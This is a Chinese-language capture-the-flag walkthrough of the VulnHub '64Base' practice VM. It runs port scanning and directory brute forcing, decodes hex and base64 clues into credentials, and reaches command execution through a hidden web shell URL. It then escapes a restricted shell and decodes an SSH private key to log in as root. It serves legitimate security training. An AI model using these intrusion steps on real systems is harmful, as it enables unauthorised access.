2020-1-7:vulnhub靶场练习,64Base
一、环境搭建
1,下载地址,https://www.vulnhub.com/entry/64base-101,173/
2,使用VirtualBox虚拟机软件,导入
3,启动,为了方便练习,网卡设置的桥接模式
二、渗透练习
1,获取靶机ip地址
输入命令,netdiscover,获取到靶机ip地址,192.168.1.102
2,获取靶机开启哪些服务,端口
输入命令,nmap -sT -T4 -p- 192.168.1.102
-sT,TCP connect()扫描,这是最基本的TCP扫描方式。这种扫描很容易被检测到,在目标主机的日志中会记录大批的连接请求以及错误信息。
-T4,指定扫描过程使用的时序(Timing),总有6个级别(0-5),级别越高,扫描速度越快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况良好的情况推荐使用T4
-p-,指定扫描的端口为所有端口,及1-65535
发现开启了,22,80.4899,62964端口
22,为SSH服务
80,为HTTP服务
4899,Radmin远控服务,是一个远程控制软件(remote administrator)服务端监听的端口
62964,不是常见端口
3,既然开启了80端口,就访问网站,看看是否有突破口
首页
About页
POST页
CONTACT页
4,根据首页提示的Base64解密得到的信息,查看首页源码,发现一串字符串
得到的字符串为:
5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a
字符串为16位字符串,进行转码,得到字符串:
ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==
显然字符串为Base64加密的,解密为第一个flag:
flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
5,看flag1里面的值也是Base64加密的,所以对flag1的值进行解密,得到字符串
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
7,寻找线索,在POST页面最下边,找到线索
图像下边有一句:IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377。
再下边有一句评论:Only respond if you are a real Imperial-Class BountyHunter
8,输入命令,dirb http://192.168.1.102 | grep "CODE:401",爆破目录,发现admin目录
进行访问
使用flag得到的账号密码登录不上
9,候制作暴破的密码字典并开始暴破,通过递归复制博客中的所有内容(包括robots.txt,HTML和JavaScript)来制作字典。使用wget正确的标志允许我们将所有内容转储到单个文件中。然后我们可以使用的工具html2dic,并 sort 把它清理干净,并将其转换成可用单词表。
输入命令:wget http://192.168.1.102 -rq -O base64.out
输入命令:html2dic base64.out|sort -u > base64.dict
输入命令:wc -l base64.dict
输入命令:dirb http://192.168.1.102 base64.dict|grep "CODE:401"
重新爆破出一个目录,Imperial-Class
访问新爆破出来的目录,一样提示要登录,输入flag1得到的账号密码,登录成功,但是报错,路径不正确,提示TO THE DARK SIDE!
10,想到之前POST界面的提示信息:Only respond if you are a real Imperial-Class BountyHunter,就得到路径
http://192.168.1.102/Imperial-Class/BountyHunter/
使用flag1得到的账号密码,进行登录,发现界面虽然没有变,但是url变成了
http://192.168.1.102/Imperial-Class/BountyHunter/index.php
源码下多出了一串字符串
basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a
还有两个id
id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756"
id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32"
将得到的几串id值,和basictoken的值放在一起,得到字符串
5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a
看来还是16位编码的,解码之后得到字符串
ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=
对得到的Base64编码的值再次解码,得到
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
11,把flag2里的值进行解密,得到字符串https://www.youtube.com/watch?v=vJwytFWA8uA,一个视频网址
12,访问连接,是一个不说话的视频,不过标题提示了,使用Burp
13,打开BP,重新输入flag1得到的账号密码。进行抓包,得到flag3
flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
14,将flag3解密得到,53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id
访问页面结果为webshell界面,不过没返回值
15,想起之前提示:IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377
将URL换成http://192.168.1.102/Imperial-Class/BountyHunter/login.php?f=system&c=id,返回结果
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==} 还有当前用户的id
id换成ls -l,可以列出当前目录
16,对flag4的值进行解密,得到字符串
64base:64base5h377
17,使用得到的账号密码进行ssh登录,无法登录,提示没主机,指定端口62964才是ssh服务
18,看flag4的密码字符串64base5h377,对他进行base64编码,得到NjRiYXNlNWgzNzcK
使用加密之后的密码字符串,登录成功
17,所有命令都无法运行,只有ls得到
well_done_:D
18,发现ind,python,ruby 等很多命令都不能运行,但是 base64 可以运行
输入命令, base64 well_done_:D | base64 --decode
19,测试发现env和echo $PATH/*也都可以运行
20,查看可用的命令,发现一条/var/alt-bin/droids
21,不了解是什么命令,就运行了一下,出现界面
22,发现运行过之后,打破了没法输入shell命令的情况
23,在/var/www/html/admin/S3cR37目录下,找到了flag5
解密得到
Look Inside! :D
24.根据提示查看flag5
输入命令:file flag5\{TG9vayBJbnNpZGUhIDpECg\=\=\} ,发现16位字符串
25,为了看全字符串,输入命令
flag5\{TG9vayBJbnNpZGUhIDpECg\=\=\} | /usr/bin/head
得到完整16进制字符
26,进行转码,解密,得到一个私钥
echo "得到的所有字符串" | xxd -p -r | base64 --decode
27,将得到的私钥,输出成一个密钥文件
echo "得到的16进制字符串" | xxd -p -r | base64 --decode > /tmp/ssh.key
28,使用得到的密钥进行登录
输入命令:ssh root@192.168.1.102 -p 62964 -i ssh.key,提示需要密钥
29,将靶机下的flag5图片,传输到攻击机
在kali下执行命令:scp -P 62964 64base@192.168.1.102:/var/www/html/admin/S3cR37/flag5* flag5.jpeg PS:注意这条命令用zsh shell的话会提示zsh: no matches found
打开图片
30,再次使用密钥登录,注意,密钥文件要改权限为600,否则无法使用
输入命令:ssh -p 62964 root@127.0.0.1 -i /tmp/ssh.key
密码输入图片上的字符,usetheforce
登录成功,得到flag6
31,逐步解密
echo "NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK" | base64 -d
echo "4e546b325a4451324e324531595455304e546b7a4d4451354e444d7a4d545a694e446b304d7a4d354d7a49314f5455344e446b334e6a59794e44637a4f545a684e546b314e7a63334e7a5930597a5a6b4e7a677a4d5459784d7a49314e6a4d344e6a49304e7a55324e3245324d7a63354d7a55334f5456684e5463304e6a637a4e444d324e7a4e6b4d32517759516f3d0a" |xxd -p -r|base64 -d
echo "596d467a5a5459304943316b49433932595849766247396a595777764c6d7831613256386247567a637935795a57467343673d3d0a" |xxd -p -r|base64 -d
得到字符串:
base64 -d /var/local/.luke|less.real
运行得到的命令,最终完成
完